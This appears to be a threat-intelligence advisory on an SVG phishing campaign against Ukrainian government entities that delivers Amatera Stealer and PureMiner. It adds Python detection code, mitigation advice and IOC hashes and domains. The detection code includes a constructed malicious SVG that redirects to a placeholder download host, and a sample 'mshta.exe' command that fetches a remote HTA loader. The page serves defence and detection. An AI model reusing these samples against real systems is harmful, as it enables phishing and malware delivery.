SVG Phishing hits Ukraine with Amatera Stealer, PureMiner

Severity: Medium
Published: Fri Sep 26 2025 (09/26/2025, 20:06:05 UTC)
Source: AlienVault OTX General

Description

A phishing campaign targeting Ukrainian government entities uses malicious SVG files to initiate an infection chain. The attack begins with emails containing SVG attachments that redirect victims to a download site. A CHM file is then used to execute a remote HTA loader, which delivers two malware payloads: Amatera Stealer and PureMiner. Amatera Stealer harvests extensive information from infected systems, including credentials, system data, application data, browser files, and cryptocurrency wallets. PureMiner collects hardware information and monitors system activity to deploy efficient CPU or GPU mining modules. The campaign demonstrates sophisticated techniques, including fileless malware delivery and the use of multiple stages to evade detection.

AI-Powered Analysis

Last updated: 09/29/2025, 09:24:25 UTC

Technical Analysis

This threat describes a phishing campaign against Ukrainian government entities that uses malicious SVG (Scalable Vector Graphics) files as the initial infection vector. The emails carry SVG attachments; because an SVG is an XML document that may contain script, event handlers and links, opening one in a browser can redirect the victim to a malicious download site. From there a CHM (Compiled HTML Help) file is downloaded and opened, and the CHM in turn launches a remote HTA (HTML Application) loader. This multi-stage chain delivers two payloads: Amatera Stealer and PureMiner.

Amatera Stealer is an information stealer that harvests credentials, system and application data, browser files and cryptocurrency wallet data, a direct risk to confidentiality. PureMiner is a cryptominer that profiles the host's hardware and monitors system activity before deploying CPU or GPU mining modules, degrading performance and raising operating costs.

The campaign relies on fileless delivery (the HTA loader is pulled from a remote location and executed rather than dropped to disk as an executable) and on several intermediate stages, so that no single artifact looks obviously malicious to signature-based antivirus or endpoint tooling. SVG attachments are notable because many mail gateways classify them as images rather than active content and let them through filters that would block .js or .hta attachments. Pairing credential theft with cryptomining points to a dual-purpose operation: espionage and financial gain. The indicators listed below (file hashes and domains) can be used for detection and blocking.

In MITRE ATT&CK terms the chain maps to phishing with a malicious attachment (T1566), system binary proxy execution through a Compiled HTML File (T1218.001) and Mshta (T1218.005), process injection for the in-memory stages (T1055), and boot or logon autostart persistence (T1547); the write-up does not detail which autostart mechanism is used.
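The SVG stage above turns on traits a static image never needs: script elements, on* event handlers, javascript: or data: hrefs, and foreignObject or meta-refresh redirects. The following is an added example (not code from the Fortinet or OTX write-up) of a mail-gateway triage check that parses an SVG attachment and reports those traits plus any URLs it finds; the two sample SVGs and the download URL in them are constructed placeholders, not campaign artifacts.

```python
# Added example: static triage of an SVG attachment for script/redirect traits.
# Not from the original write-up; sample SVGs and URLs below are constructed.
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
XHTML_NS = "http://www.w3.org/1999/xhtml"

# Elements and attributes that have no business in an image-only attachment.
SCRIPT_TAGS = {f"{{{SVG_NS}}}script", f"{{{XHTML_NS}}}script", "script"}
FOREIGN_TAGS = {f"{{{SVG_NS}}}foreignObject", "foreignObject"}
REDIRECT_TAGS = {f"{{{XHTML_NS}}}meta", "meta", f"{{{XHTML_NS}}}iframe", "iframe"}
HREF_ATTRS = {"href", f"{{{XLINK_NS}}}href"}
URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.IGNORECASE)


def triage_svg(svg_bytes: bytes) -> dict:
    """Return {'findings': [...], 'urls': [...]} for one SVG document.

    findings are reasons to quarantine; urls are candidate IOCs to look up.
    A document that is not well-formed XML is reported as a finding too,
    since a malformed 'image' is itself suspicious.
    """
    findings, urls = [], set()
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return {"findings": [f"not well-formed XML ({exc})"], "urls": []}

    for el in root.iter():
        tag = el.tag
        if tag in SCRIPT_TAGS:
            findings.append("embedded <script> element")
            urls.update(URL_RE.findall(el.text or ""))
        if tag in FOREIGN_TAGS:
            findings.append("<foreignObject> (can host arbitrary HTML)")
        if tag in REDIRECT_TAGS:
            findings.append(f"<{tag.split('}')[-1]}> inside SVG (redirect/iframe)")
        for name, value in el.attrib.items():
            local = name.split("}")[-1]          # strip namespace prefix
            urls.update(URL_RE.findall(value))   # meta refresh, href, handlers
            if local.startswith("on"):           # onload=, onclick=, ...
                findings.append(f"event handler attribute {local}=")
            if name in HREF_ATTRS:
                scheme = value.strip().lower().split(":", 1)[0]
                if scheme in ("javascript", "data"):
                    findings.append(f"{local} uses {scheme}: scheme")
                elif scheme in ("http", "https"):
                    findings.append(f"{local} points off-host")
    return {"findings": sorted(set(findings)), "urls": sorted(urls)}


def should_quarantine(svg_bytes: bytes) -> bool:
    """Gateway decision: any finding at all means hold the attachment."""
    return bool(triage_svg(svg_bytes)["findings"])


# Constructed sample: a 1x1 decoy whose onload handler and script both bounce
# the viewer to a download site. The host is a placeholder, not an IOC.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1"
  onload="window.location='https://download.example.invalid/doc.chm'">
  <script>//<![CDATA[
    setTimeout(function(){ location.href='https://download.example.invalid/doc.chm'; }, 100);
  //]]></script>
</svg>"""

# Constructed sample: a plain drawing with no active content.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <rect x="1" y="1" width="8" height="8" fill="#336"/>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG)):
        print(label, triage_svg(doc), "quarantine:", should_quarantine(doc))
```

The check is deliberately strict: a legitimate SVG attachment from a design tool may carry an xlink:href to an external image, which this flags as "points off-host". Treat that as a hold-for-review rather than a hard block, and feed the extracted URLs to your blocklist lookup.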

Potential Impact

For European organizations, especially those with diplomatic, governmental or strategic ties to Ukraine, this threat poses a significant risk. The credential theft capabilities of Amatera Stealer could lead to unauthorized access to sensitive systems, data breaches and espionage, which is particularly concerning for entities in the political, defense and critical infrastructure sectors. The cryptomining activity of PureMiner degrades system performance, increases energy consumption and shortens hardware life, affecting operational continuity. Organizations not directly targeted are still exposed if the campaign's targeting widens or if credentials stolen from a partner are reused against them. The fileless techniques complicate detection and remediation and increase the likelihood of a prolonged, undetected presence. The focus on government entities suggests a geopolitical motive, which could extend to European institutions supporting Ukraine or involved in related matters.

Mitigation Recommendations

1. Enhance email security by configuring advanced filtering to detect and block SVG attachments and suspicious CHM or HTA files. Sandbox attachments before delivery, and make sure the sandbox actually renders SVGs in a browser engine rather than treating them as static images.
2. Educate users on the risks of opening unexpected SVG files and other attachments, emphasizing verification of sender authenticity. On endpoints, consider associating .svg with an image viewer rather than a browser, so script inside an SVG does not run when a user double-clicks it.
3. Deploy endpoint detection and response (EDR) solutions capable of identifying fileless malware behaviors and multi-stage infection chains, in particular hh.exe (the CHM viewer) spawning mshta.exe, and mshta.exe launched with an http(s) URL on its command line.
4. Monitor DNS and proxy logs for the malicious domains listed in the indicators and block them at the firewall or proxy level.
5. Implement application control (for example WDAC or AppLocker) that blocks hh.exe and mshta.exe for standard users, so CHM and HTA files cannot execute even if delivered.
6. Regularly audit and secure credential storage and access controls to limit the impact of stolen credentials; rotate credentials on any host confirmed infected with Amatera Stealer.
7. Use multi-factor authentication (MFA) broadly to reduce the risk of compromised credentials leading to unauthorized access.
8. Continuously update and patch systems to minimize exploitation opportunities, even though this campaign does not exploit a specific CVE.
9. Conduct threat hunting focused on signs of cryptomining: sustained CPU or GPU utilization from unexpected processes, and connections to mining pools.
10. Establish incident response plans that specifically address multi-stage phishing and fileless malware attacks.
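Recommendations 3 and 4 above reduce to a handful of behavioural checks plus IOC matching. The following is an added example (not code from the Fortinet or OTX write-up) that implements those checks over Sysmon-style process-creation and DNS events and matches hosts and hashes against the indicator lists on this page. The event records are constructed: paths, user names, the svc.exe name and the .hta URL are invented, and although the queried domain and the matched SHA-256 are taken from the IOC lists, the page does not say which stage of the chain each belongs to.

```python
# Added example: detection logic for the CHM -> remote HTA stage plus IOC
# matching, run over constructed Sysmon-style events. Not from the write-up.
import re
from urllib.parse import urlsplit

# Domains and a few SHA-256 values copied from the indicator lists on this page.
IOC_DOMAINS = {
    "acqua-tecnica.it", "ama0899.shop", "amaprox.click",
    "npulvivgov.cfd", "phuyufact.com",
}
IOC_SHA256 = {
    "27c9c4e200815a9f474126afa05d4266bc55aafa9df0681a333267e4bbd101de",
    "2bd4df59071409af58d0253202b058a6b1f1206663236dea5163e7c30a055f21",
    "61fee7e2012919fafc3b47b37753ff934f7a0ca2a567dca5f15d45ab55ae2211",
}
# Children that the CHM viewer has no legitimate reason to spawn.
SUSPICIOUS_CHM_CHILDREN = {"mshta.exe", "cmd.exe", "powershell.exe",
                           "wscript.exe", "cscript.exe", "rundll32.exe"}
USER_WRITABLE = re.compile(r"\\(downloads|temp|appdata)\\", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _ioc_domain(host: str) -> bool:
    """True for an IOC domain or any subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def _sha256_of(hashes_field: str) -> str:
    # Sysmon writes "MD5=...,SHA256=...,IMPHASH=..."
    for part in hashes_field.split(","):
        key, _, value = part.partition("=")
        if key.strip().upper() == "SHA256":
            return value.strip().lower()
    return ""


def check_event(ev: dict) -> list:
    """Return a list of alert strings for one event (empty list = no alert)."""
    hits = []
    if ev.get("EventType") == "DnsQuery":
        if _ioc_domain(ev.get("QueryName", "")):
            hits.append(f"DNS query for IOC domain {ev['QueryName']} "
                        f"by {_basename(ev.get('Image', ''))}")
        return hits
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image == "hh.exe" and USER_WRITABLE.search(cmd):
        hits.append("hh.exe opening a CHM from a user-writable path")
    if parent == "hh.exe" and image in SUSPICIOUS_CHM_CHILDREN:
        hits.append(f"hh.exe spawned {image}")
    if image == "mshta.exe":
        for url in URL_RE.findall(cmd):            # remote HTA loader
            host = urlsplit(url).hostname or ""
            hits.append(f"mshta.exe fetching remote HTA from {host}")
            if _ioc_domain(host):
                hits.append(f"HTA host {host} is an IOC domain")
    if _sha256_of(ev.get("Hashes", "")) in IOC_SHA256:
        hits.append("image SHA-256 matches campaign IOC")
    return hits


def scan(events: list) -> dict:
    """Return {event index: [alerts]} for every event that fired a check."""
    return {i: h for i, ev in enumerate(events) if (h := check_event(ev))}


# Constructed telemetry approximating the chain (see lead-in for what is invented).
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "chrome.exe --profile-directory=Default",
     "Hashes": "SHA256=" + "0" * 64},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\hh.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\olena\Downloads\Dokument.chm',
     "Hashes": "SHA256=" + "1" * 64},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": "mshta.exe https://hta.example.invalid/loader.hta",
     "Hashes": "SHA256=" + "2" * 64},
    {"EventType": "DnsQuery", "Image": r"C:\Windows\System32\mshta.exe",
     "QueryName": "amaprox.click"},
    {"EventType": "ProcessCreate", "Image": r"C:\Users\olena\AppData\Local\Temp\svc.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "svc.exe",
     "Hashes": "MD5=" + "f" * 32 + ",SHA256=27c9c4e200815a9f474126afa05d4266bc55aafa9df0681a333267e4bbd101de"},
]

if __name__ == "__main__":
    for idx, alerts in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].get("Image"), alerts)
```

The hh.exe-from-Downloads check will fire on users who legitimately open downloaded help files, so keep it at a low severity and let the parent/child and remote-URL checks drive escalation; those two have essentially no benign equivalent in a managed environment.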

Technical Details

Author: AlienVault
TLP: WHITE
References: https://www.fortinet.com/blog/threat-research/svg-phishing-hits-ukraine-with-amatera-stealer-pureminer
Adversary: not attributed
Pulse Id: 68d6f22df576f8efbd6366e1
Threat Score: none

Indicators of Compromise

Hashes (MD5)

2b2013f31a1e7960109518de61be6bd0
bf14c2f70c16e1dbb340e6c89c8d6cb2
d321d77c8aeca95edfd37a8935427251

Hashes (SHA-1)

3edf7065c7b23447e8b50c7fbd38ccc5eb234d62
82cf7ab9889b7f61843855156afbbae274894526
c014fbbbf73ade3b4c405e74ef3d9cea6569c8f9

Hashes (SHA-256)

27c9c4e200815a9f474126afa05d4266bc55aafa9df0681a333267e4bbd101de
2bd4df59071409af58d0253202b058a6b1f1206663236dea5163e7c30a055f21
61fee7e2012919fafc3b47b37753ff934f7a0ca2a567dca5f15d45ab55ae2211
7deb9e6398c92cf01502f32a78c16f55354dcf3d2b062918f6651852742bc7cd
7f505f8a947715ae954e5eb93e9e1911843dc2c16462a146e5658e4101cedc0e
9cbb497f0878a073504d3699cfbd86a816c7941234729631722d010f6ecd09f5
9d2a88f7f4d6925e654ee3edcd334eb9496a279ee0c40f7b14405b35500ebf99
b8fb772d92a74dcd910ac125ead1c50ce5834b76f58e7f107bb1e16b8c16adbb
bcce8115784909942d0eb7a84065ae2cd5803dc9c45372a461133f9844340436
bf9e6bee654831b91e891473123bbd9bc7ff3450471e653c7045f5bd8477d7a1
c25e4bd9e8d49f3beef37377414028b07986dacce5551f96038b930faf887acc
c62fe8d6c39142c7d8575bd50e6f2fcd9f92c4f0a1a01411d0f3756a09fd78a7
d71148d7e64f2a3464488d696ac2312987eb4e8008c9a62956388d39905c865f

Domains

acqua-tecnica.it
ama0899.shop
amaprox.click
npulvivgov.cfd
phuyufact.com

Threat ID: 68da4fcd5fbdde62c760164d

Added to database: 9/29/2025, 9:22:21 AM

Last enriched: 9/29/2025, 9:24:25 AM

Last updated: 9/29/2025, 2:14:27 PM
